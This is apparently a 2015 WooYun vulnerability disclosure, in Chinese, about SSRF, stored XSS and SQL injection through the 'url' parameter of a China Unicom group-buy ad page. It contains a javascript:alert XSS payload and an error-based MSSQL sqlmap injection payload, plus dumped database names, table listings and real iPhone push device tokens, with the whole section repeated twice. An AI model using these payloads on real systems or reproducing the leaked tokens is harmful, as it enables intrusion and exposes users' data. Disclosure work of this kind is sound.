漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0157265
漏洞标题:中国联通某站SQL注入/SSRF/XSS打包
相关厂商:中国联通
漏洞作者: Sai、
提交时间:2015-12-03 01:28
修复时间:2016-01-21 14:10
公开时间:2016-01-21 14:10
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-03: 细节已通知厂商并且等待厂商处理中
2015-12-07: 厂商已经确认,细节仅向厂商公开
2015-12-17: 细节向核心白帽子及相关领域专家公开
2015-12-27: 细节向普通白帽子公开
2016-01-06: 细节向实习白帽子公开
2016-01-21: 细节向公众公开
简要描述:
网站iframe的src直接对应参数url地址,未作任何过滤,直接就导致SSRF和存储xss
SQL注入挺意外,url被带入了数据库我实在没想到
详细说明:
漏洞地址:
**.**.**.**:7301/puple_page/index.php/gx_tuangou/open_ad?url=
0x01 SSRF
接收一个url参数输出到页面
由此可以猜测存在SSRF,手动探测了下
**.**.**.**:7301/puple_page/index.php/gx_tuangou/open_ad?url=**.**.**.**
弱口令猜解没成功,爆破无力
**.**.**.**:7301/puple_page/index.php/gx_tuangou/open_ad?url=**.**.**.**
本打算跑内网IP段,结果也跑不出来……
0x02 作死xss
为什么说作死呢?看一下代码
将获取的url地址直接输出在iframe的src中,加之未做任何过滤,可直接加载远端js形成存储型XSS,然后之前ssrf跑内网IP段不通也可以解释了
**.**.**.**:7301/puple_page/index.php/gx_tuangou/open_ad?url=javascript:alert(1)
0x03 SQL注入
这个后端逻辑奇葩,8个数据库
sqlmap identified the following injection point(s) with a total of 252 HTTP(s) requests:
---
Parameter: url (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: url='+(SELECT 'goHg' WHERE 5763=5763 AND 4970=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4970=4970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113))))+'
---
web server operating system: Windows
web application technology: PHP 5.3.2, Apache 2.2.22
back-end DBMS: Microsoft SQL Server 2008
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: url (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: url='+(SELECT 'goHg' WHERE 5763=5763 AND 4970=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4970=4970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113))))+'
---
web server operating system: Windows
web application technology: PHP 5.3.2, Apache 2.2.22
back-end DBMS: Microsoft SQL Server 2008
available databases [12]:
[*] flyds
[*] flylog
[*] gzydkhd
[*] master
[*] model
[*] msdb
[*] out_system_interface
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] wolegou
[*] yiquantong
back-end DBMS: Microsoft SQL Server 2008
Database: flyds
[38 tables]
+------------------------+
| news_content-备份 |
| _tmp_panr |
| d_draw_comment |
| d_draw_list |
| d_share_yd |
| fj_error_data |
| l_dazhaxie |
| l_dfw_comment |
| l_dfw_comment_2014 |
| l_dfw_dingdan |
| l_dfw_double_goods |
| l_dfw_list |
| l_dfw_list_2014 |
| l_ladyclub |
| l_ladyclub_share |
| l_zjd_comment |
| l_zjd_list |
| l_zjd_list20140901 |
| m_appledevice |
| m_goods_tag |
| m_homead |
| m_mobileapi_log |
| m_pushmsg |
| m_suggestion |
| news_class |
| news_content |
| o_comment |
| o_comment_respond |
| o_comment_yd |
| o_coupon |
| o_deal201311 |
| o_gzydkhd_actives |
| o_gzydkhd_goodslink |
| o_index |
| o_promption201311 |
| o_shop |
| o_tuangou |
| o_wap_active_goodslink |
+------------------------+
web server operating system: Windows
web application technology: PHP 5.3.2, Apache 2.2.22
back-end DBMS: Microsoft SQL Server 2008
Database: flyds
[112 tables]
+---------------------------------------------+
| news_content-备份 |
| _tmp_panr |
| d_draw_comment |
| d_draw_list |
| d_share_yd |
| fj_error_data |
| l_dazhaxie |
| l_dfw_comment |
| l_dfw_comment_2014 |
| l_dfw_dingdan |
| l_dfw_double_goods |
| l_dfw_list |
| l_dfw_list_2014 |
| l_ladyclub |
| l_ladyclub_share |
| l_zjd_comment |
| l_zjd_list |
| l_zjd_list20140901 |
| m_appledevice |
| m_goods_tag |
| m_homead |
| m_mobileapi_log |
| m_pushmsg |
| m_suggestion |
| news_class |
| news_content |
| o_comment |
| o_comment_respond |
| o_comment_yd |
| o_coupon |
| o_deal201311 |
| o_gzydkhd_actives |
| o_gzydkhd_goodslink |
| o_index |
| o_promption201311 |
| o_shop |
| o_tuangou |
| o_wap_active_goodslink |
| o_wap_actives |
| o_yhq_detail |
| o_youhuiquan |
| q_custom_service |
| q_kaquan |
| q_kaquan_corpaddr |
| q_kaquan_log |
| q_kaquan_type3_goodsrange |
| q_lingquan |
| s_admin |
| s_cache_server |
| s_dev |
| s_role |
| s_stat_day |
| s_stat_day_city |
| s_stat_month |
| s_sysid |
| s_sysval |
| t_commis_requisition |
| t_commis_top |
| t_commis_top_month |
| t_commission |
| t_commission_not_accomplish |
| t_goodsinfo_raw |
| t_record |
| t_request_commis |
| t_session_unique |
| t_session_unique_20150116_1200 |
| t_session_unique_20150116_1230 |
| t_session_unique_20150116_1230_haoduan |
| t_session_unique_20150116_1230_with_haoduan |
| t_session_unique_back |
| t_session_unique_custom_rate |
| t_session_unique_sta |
| t_taobaok |
| t_valueadd_log |
| t_valueadd_set |
| t_youhuiquan_log |
| t_zfb_trade |
| t_zhecocode |
| test_mobile |
| u_black |
| u_business |
| u_favorites |
| u_fee |
| u_user |
| u_user_back_at_20130922_1400 |
| u_user_stop |
| u_user_stop_back_at_20141128 |
| u_userval |
| user_address |
| uyghur_addr |
| uyghur_citylist |
| uyghur_deliverfee_dict |
| uyghur_gooods |
| uyghur_gooodssuit |
| uyghur_order |
| uyghur_ordergoodsdetail |
| v_custom_list |
| v_custom_page |
| v_daijinquan |
| v_daijinquan_log |
| v_home |
| v_home_yd |
| v_iptv |
| v_shop |
| v_taobaok |
| v_taobaok_bak20131101 |
| y_activity_comment |
| y_activity_list |
| y_like_yd |
| y_share_yd |
| y_suggest_yd |
| y_workorder |
+---------------------------------------------+
back-end DBMS: Microsoft SQL Server 2008
Database: flylog
Table: _not_used_m_iphone
[758 entries]
+-----+------+-------+-----------+--------------------+-----------+-------------+------------------------------------------------------------------+
| id | sIp | badge | tLastPush | tRegister | sLastPush | tUnregister | devicetoken |
+-----+------+-------+-----------+--------------------+-----------+-------------+------------------------------------------------------------------+
| 100 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | e726450d0d34128e6fb9d956d269fcbd682022e4c8e2e9414316c2379a6b33cd |
| 101 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | fcc1e3b8bafd6058a9972eae099fcd78a98ecd3554d5d824903ac4e4aeda4fd4 |
| 102 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 493278af966704d5d81570eac3a899779d5b1eda3899d50dacc30011d2286ebc |
| 103 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | c0ce0172fb7a7a3b5e04c7a457db0bd6230cd7df5734364c218aaaf5f4065b1e |
| 104 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | ceea7be233dc888b1207d6382a4ab176e23c286db1be8d14b7461d54b1b5f579 |
| 105 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 2836a37b5a3c2e6a5d5efbf973ff5d337bd3bf6864c06e23d547116b065dbcb7 |
| 106 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 4c51b1e211ebc08007d1df73f19cdf5125390314e7452fec9c12d281f6497945 |
| 107 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 9140102a254e5ff671a024688287081b61fb5132fe2ba03f8b21fb3edf5be622 |
| 108 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | f40ed6b223a8dcc1c867c3bc0dca00a30017b7b2531f31bcef370c48645e3f1f |
| 109 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 40ed26623523743f04690c4ee100beaa3d2bd579eae152824bc2e47bcf0bb4aa |
| 110 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | e1ad42c7efb2ec0c94f1e75f000734e6325fa8541a4e0cd9d36001ce1dfbad44 |
| 111 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | edb7f6d7972bbb0ff38347c7bd5ca4ca00eb728fae440fd38f7e328c537b3adc |
| 112 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | be89d64262431b2972b54bb53632eceb17f414e34c2db4fa6bc3308a3aca6731 |
| 113 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 2f20bf3de0b7e70beca46a748f8d5de3d5fb3186652671d95ec64119da8c010b |
| 114 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | d40f4c4f85a561f4cfac32fa56c9a5cb0c71d5ec92d11a3be0d17f8f7b3ecc9f |
| 115 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 2a247bcb8b599f371b1b28dfbb86478fb920cc1a75742d58dddf2c2565d97037 |
| 117 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 8c966a96701a212f5757130361a8b65a7e16c8a488028f70980e8c9c49a0166f |
| 118 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 4102a679cd104719716032ca225157581b605a9fd74b8b42308cb645b9528705 |
| 119 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 16e8af7ee1e7e3a43762547eacb6dceb2b77f0fc5ec09de057b49a66a05458ba |
| 120 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 6e0105fddc7738de5edb52852a4fab9b5bc865bec0fa466b7de660a77fc33eac |
| 121 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 4fec62808d00f76eadb13056e5a59dba9f473375772c27301e5741793b425a0f |
| 122 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 89017e1fbed8fecc877b00cd846e12964be3ddde51e647b6fe6d892a8434fce2 |
| 123 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 7a4d16c28e748ec82e95f79e6f9282d0ef9482eb30887036bde52529568b4043 |
| 124 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | c4f52ee1a6e30d0288fad7a4de0594fc76bb4a376fad7747f0c53ed33084e45e |
| 125 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 0fc3dd96613edc091bca9e36f54a1b946227550f56162782ecc2a9947278df88 |
| 126 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | f7586bd4862d28f8eeb03cecce218bcebf49f5df7c0d63cf0162c0c957b54aed |
| 127 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 4739c32f31b029cd0055de74aa66cffc02c90125396df40290721d1ef693ef7c |
| 128 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | b8bc9a0f3d19f12f4eee958b5c81ab840da011ecc3d634c4efc48f746c0c2e92 |
| 129 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 4b0a1e24c161b4693c342f7388203835253b80c278af2185ee0958005a75378f |
| 130 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 3251865b204e6fb81ad5598df05d793da2de219c5bbd94a664b856a3a71fd999 |
| 131 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 02d935e27e9f9e5328c55f52d5b196dfcb0b4e4698eca6ed9795933a0a3c5688 |
| 132 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 5a5cc41a175d1c2cb8f0fc75b082ca37dfc2b2dd0b9c991d1718167668c63745 |
| 133 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | ea2569cd04010302b7125172879986f9ca92022164d8efaad8849c0151d49820 |
| 134 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 997d1d8bcd4aed26e16dd88a994158997e507fa0481531d7f76782456ad965a8 |
| 135 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | a5d1027cacd386709a518a7ed379497c96125ad5ac7f2e675279715b24f08947 |
| 136 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | e866f54f61c3f9466605f7e99697592893027fbc84722d47bc6c99f003d30351 |
| 137 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | a053ce6e2e7ac7f1623701d67814a4e47eca7f9a9a8d4ba45ef3ea2b0ca97e84 |
| 138 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | d4ddb2218b250d6cd758c362271b773d047cdb0b62eb8c7b618b149cac34676e |
| 139 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | fced64bdaf2cc4ba07ee34b997288246e10e39a27a3f909f6ff452be0cbe9b8f |
| 140 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 151b9bcbceffed0e305797dbbcfab3a26210b8e0e9242b2c2f079ae02f978fbf |
| 141 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | f840c2657e316fbf4b81e9a5c53076e957187832da704406c01e698454b584fd |
| 142 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | da67ae2ffa13c2960eb812b4c1610f00dcdb86f716688760b33b179dd3a58e6a |
| 143 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | c75e539cd54f1d0a703d8c726ebb6221b3b8f133f7362c739784fa11121479cb |
| 144 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 91615fbb768abeb74b50d572d2abb9116eb2f0f25df3555b58c593b4b04386ff |
| 145 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 4726d812ecebbfa799c32f931e19351c38eaafb28f65cd34e08e3933f5d84152 |
| 146 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 33d018a27da672cf5fb5b30df706ed4b311df12c3c80516af479e2776401b88d |
| 147 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 7cd4753643b55c6254db68a01930fc08eecd01a3cfaeaaca64f7c8e5fee0c618 |
| 148 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | ed292fb8eb72c630365b965dd5e4b738e624b07366a59522d1d23b530a2012c3 |
| 149 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | a77f04571e6be726c1e0307ab5129474c787f7986c0cb223e60799da5397339d |
| 150 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | b2fb63cdedf9d11e751fe5149eb97fec7da36aafa7a2910084f21dd76fdb7187 |
数据比较多,就不一一跑了
漏洞证明:
漏洞地址:
**.**.**.**:7301/puple_page/index.php/gx_tuangou/open_ad?url=
0x01 SSRF
接收一个url参数输出到页面
由此可以猜测存在SSRF,手动探测了下
**.**.**.**:7301/puple_page/index.php/gx_tuangou/open_ad?url=**.**.**.**
弱口令猜解没成功,爆破无力
**.**.**.**:7301/puple_page/index.php/gx_tuangou/open_ad?url=**.**.**.**
本打算跑内网IP段,结果也跑不出来……
0x02 作死xss
为什么说作死呢?看一下代码
将获取的url地址直接输出在iframe的src中,加之未做任何过滤,可直接加载远端js形成存储型XSS,然后之前ssrf跑内网IP段不通也可以解释了
**.**.**.**:7301/puple_page/index.php/gx_tuangou/open_ad?url=javascript:alert(1)
0x03 SQL注入
这个后端逻辑奇葩,8个数据库
sqlmap identified the following injection point(s) with a total of 252 HTTP(s) requests:
---
Parameter: url (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: url='+(SELECT 'goHg' WHERE 5763=5763 AND 4970=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4970=4970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113))))+'
---
web server operating system: Windows
web application technology: PHP 5.3.2, Apache 2.2.22
back-end DBMS: Microsoft SQL Server 2008
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: url (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: url='+(SELECT 'goHg' WHERE 5763=5763 AND 4970=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (4970=4970) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(113))))+'
---
web server operating system: Windows
web application technology: PHP 5.3.2, Apache 2.2.22
back-end DBMS: Microsoft SQL Server 2008
available databases [12]:
[*] flyds
[*] flylog
[*] gzydkhd
[*] master
[*] model
[*] msdb
[*] out_system_interface
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] wolegou
[*] yiquantong
back-end DBMS: Microsoft SQL Server 2008
Database: flyds
[38 tables]
+------------------------+
| news_content-备份 |
| _tmp_panr |
| d_draw_comment |
| d_draw_list |
| d_share_yd |
| fj_error_data |
| l_dazhaxie |
| l_dfw_comment |
| l_dfw_comment_2014 |
| l_dfw_dingdan |
| l_dfw_double_goods |
| l_dfw_list |
| l_dfw_list_2014 |
| l_ladyclub |
| l_ladyclub_share |
| l_zjd_comment |
| l_zjd_list |
| l_zjd_list20140901 |
| m_appledevice |
| m_goods_tag |
| m_homead |
| m_mobileapi_log |
| m_pushmsg |
| m_suggestion |
| news_class |
| news_content |
| o_comment |
| o_comment_respond |
| o_comment_yd |
| o_coupon |
| o_deal201311 |
| o_gzydkhd_actives |
| o_gzydkhd_goodslink |
| o_index |
| o_promption201311 |
| o_shop |
| o_tuangou |
| o_wap_active_goodslink |
+------------------------+
web server operating system: Windows
web application technology: PHP 5.3.2, Apache 2.2.22
back-end DBMS: Microsoft SQL Server 2008
Database: flyds
[112 tables]
+---------------------------------------------+
| news_content-备份 |
| _tmp_panr |
| d_draw_comment |
| d_draw_list |
| d_share_yd |
| fj_error_data |
| l_dazhaxie |
| l_dfw_comment |
| l_dfw_comment_2014 |
| l_dfw_dingdan |
| l_dfw_double_goods |
| l_dfw_list |
| l_dfw_list_2014 |
| l_ladyclub |
| l_ladyclub_share |
| l_zjd_comment |
| l_zjd_list |
| l_zjd_list20140901 |
| m_appledevice |
| m_goods_tag |
| m_homead |
| m_mobileapi_log |
| m_pushmsg |
| m_suggestion |
| news_class |
| news_content |
| o_comment |
| o_comment_respond |
| o_comment_yd |
| o_coupon |
| o_deal201311 |
| o_gzydkhd_actives |
| o_gzydkhd_goodslink |
| o_index |
| o_promption201311 |
| o_shop |
| o_tuangou |
| o_wap_active_goodslink |
| o_wap_actives |
| o_yhq_detail |
| o_youhuiquan |
| q_custom_service |
| q_kaquan |
| q_kaquan_corpaddr |
| q_kaquan_log |
| q_kaquan_type3_goodsrange |
| q_lingquan |
| s_admin |
| s_cache_server |
| s_dev |
| s_role |
| s_stat_day |
| s_stat_day_city |
| s_stat_month |
| s_sysid |
| s_sysval |
| t_commis_requisition |
| t_commis_top |
| t_commis_top_month |
| t_commission |
| t_commission_not_accomplish |
| t_goodsinfo_raw |
| t_record |
| t_request_commis |
| t_session_unique |
| t_session_unique_20150116_1200 |
| t_session_unique_20150116_1230 |
| t_session_unique_20150116_1230_haoduan |
| t_session_unique_20150116_1230_with_haoduan |
| t_session_unique_back |
| t_session_unique_custom_rate |
| t_session_unique_sta |
| t_taobaok |
| t_valueadd_log |
| t_valueadd_set |
| t_youhuiquan_log |
| t_zfb_trade |
| t_zhecocode |
| test_mobile |
| u_black |
| u_business |
| u_favorites |
| u_fee |
| u_user |
| u_user_back_at_20130922_1400 |
| u_user_stop |
| u_user_stop_back_at_20141128 |
| u_userval |
| user_address |
| uyghur_addr |
| uyghur_citylist |
| uyghur_deliverfee_dict |
| uyghur_gooods |
| uyghur_gooodssuit |
| uyghur_order |
| uyghur_ordergoodsdetail |
| v_custom_list |
| v_custom_page |
| v_daijinquan |
| v_daijinquan_log |
| v_home |
| v_home_yd |
| v_iptv |
| v_shop |
| v_taobaok |
| v_taobaok_bak20131101 |
| y_activity_comment |
| y_activity_list |
| y_like_yd |
| y_share_yd |
| y_suggest_yd |
| y_workorder |
+---------------------------------------------+
back-end DBMS: Microsoft SQL Server 2008
Database: flylog
Table: _not_used_m_iphone
[758 entries]
+-----+------+-------+-----------+--------------------+-----------+-------------+------------------------------------------------------------------+
| id | sIp | badge | tLastPush | tRegister | sLastPush | tUnregister | devicetoken |
+-----+------+-------+-----------+--------------------+-----------+-------------+------------------------------------------------------------------+
| 100 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | e726450d0d34128e6fb9d956d269fcbd682022e4c8e2e9414316c2379a6b33cd |
| 101 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | fcc1e3b8bafd6058a9972eae099fcd78a98ecd3554d5d824903ac4e4aeda4fd4 |
| 102 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 493278af966704d5d81570eac3a899779d5b1eda3899d50dacc30011d2286ebc |
| 103 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | c0ce0172fb7a7a3b5e04c7a457db0bd6230cd7df5734364c218aaaf5f4065b1e |
| 104 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | ceea7be233dc888b1207d6382a4ab176e23c286db1be8d14b7461d54b1b5f579 |
| 105 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 2836a37b5a3c2e6a5d5efbf973ff5d337bd3bf6864c06e23d547116b065dbcb7 |
| 106 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 4c51b1e211ebc08007d1df73f19cdf5125390314e7452fec9c12d281f6497945 |
| 107 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 9140102a254e5ff671a024688287081b61fb5132fe2ba03f8b21fb3edf5be622 |
| 108 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | f40ed6b223a8dcc1c867c3bc0dca00a30017b7b2531f31bcef370c48645e3f1f |
| 109 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 40ed26623523743f04690c4ee100beaa3d2bd579eae152824bc2e47bcf0bb4aa |
| 110 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | e1ad42c7efb2ec0c94f1e75f000734e6325fa8541a4e0cd9d36001ce1dfbad44 |
| 111 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | edb7f6d7972bbb0ff38347c7bd5ca4ca00eb728fae440fd38f7e328c537b3adc |
| 112 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | be89d64262431b2972b54bb53632eceb17f414e34c2db4fa6bc3308a3aca6731 |
| 113 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 2f20bf3de0b7e70beca46a748f8d5de3d5fb3186652671d95ec64119da8c010b |
| 114 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | d40f4c4f85a561f4cfac32fa56c9a5cb0c71d5ec92d11a3be0d17f8f7b3ecc9f |
| 115 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 2a247bcb8b599f371b1b28dfbb86478fb920cc1a75742d58dddf2c2565d97037 |
| 117 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 8c966a96701a212f5757130361a8b65a7e16c8a488028f70980e8c9c49a0166f |
| 118 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 4102a679cd104719716032ca225157581b605a9fd74b8b42308cb645b9528705 |
| 119 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 16e8af7ee1e7e3a43762547eacb6dceb2b77f0fc5ec09de057b49a66a05458ba |
| 120 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 6e0105fddc7738de5edb52852a4fab9b5bc865bec0fa466b7de660a77fc33eac |
| 121 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 4fec62808d00f76eadb13056e5a59dba9f473375772c27301e5741793b425a0f |
| 122 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 89017e1fbed8fecc877b00cd846e12964be3ddde51e647b6fe6d892a8434fce2 |
| 123 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 7a4d16c28e748ec82e95f79e6f9282d0ef9482eb30887036bde52529568b4043 |
| 124 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | c4f52ee1a6e30d0288fad7a4de0594fc76bb4a376fad7747f0c53ed33084e45e |
| 125 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 0fc3dd96613edc091bca9e36f54a1b946227550f56162782ecc2a9947278df88 |
| 126 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | f7586bd4862d28f8eeb03cecce218bcebf49f5df7c0d63cf0162c0c957b54aed |
| 127 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 4739c32f31b029cd0055de74aa66cffc02c90125396df40290721d1ef693ef7c |
| 128 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | b8bc9a0f3d19f12f4eee958b5c81ab840da011ecc3d634c4efc48f746c0c2e92 |
| 129 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 4b0a1e24c161b4693c342f7388203835253b80c278af2185ee0958005a75378f |
| 130 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 3251865b204e6fb81ad5598df05d793da2de219c5bbd94a664b856a3a71fd999 |
| 131 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 02d935e27e9f9e5328c55f52d5b196dfcb0b4e4698eca6ed9795933a0a3c5688 |
| 132 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 5a5cc41a175d1c2cb8f0fc75b082ca37dfc2b2dd0b9c991d1718167668c63745 |
| 133 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | ea2569cd04010302b7125172879986f9ca92022164d8efaad8849c0151d49820 |
| 134 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 997d1d8bcd4aed26e16dd88a994158997e507fa0481531d7f76782456ad965a8 |
| 135 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | a5d1027cacd386709a518a7ed379497c96125ad5ac7f2e675279715b24f08947 |
| 136 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | e866f54f61c3f9466605f7e99697592893027fbc84722d47bc6c99f003d30351 |
| 137 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | a053ce6e2e7ac7f1623701d67814a4e47eca7f9a9a8d4ba45ef3ea2b0ca97e84 |
| 138 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | d4ddb2218b250d6cd758c362271b773d047cdb0b62eb8c7b618b149cac34676e |
| 139 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | fced64bdaf2cc4ba07ee34b997288246e10e39a27a3f909f6ff452be0cbe9b8f |
| 140 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 151b9bcbceffed0e305797dbbcfab3a26210b8e0e9242b2c2f079ae02f978fbf |
| 141 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | f840c2657e316fbf4b81e9a5c53076e957187832da704406c01e698454b584fd |
| 142 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | da67ae2ffa13c2960eb812b4c1610f00dcdb86f716688760b33b179dd3a58e6a |
| 143 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | c75e539cd54f1d0a703d8c726ebb6221b3b8f133f7362c739784fa11121479cb |
| 144 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 91615fbb768abeb74b50d572d2abb9116eb2f0f25df3555b58c593b4b04386ff |
| 145 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 4726d812ecebbfa799c32f931e19351c38eaafb28f65cd34e08e3933f5d84152 |
| 146 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 33d018a27da672cf5fb5b30df706ed4b311df12c3c80516af479e2776401b88d |
| 147 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | 7cd4753643b55c6254db68a01930fc08eecd01a3cfaeaaca64f7c8e5fee0c618 |
| 148 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | ed292fb8eb72c630365b965dd5e4b738e624b07366a59522d1d23b530a2012c3 |
| 149 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | a77f04571e6be726c1e0307ab5129474c787f7986c0cb223e60799da5397339d |
| 150 | NULL | 0 | NULL | 10 15 2013 5:09PM | NULL | NULL | b2fb63cdedf9d11e751fe5149eb97fec7da36aafa7a2910084f21dd76fdb7187 |
数据比较多,就不一一跑了
修复方案:
把这个点做好过滤吧
版权声明:转载请注明来源 Sai、@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:13
确认时间:2015-12-07 14:07
厂商回复:
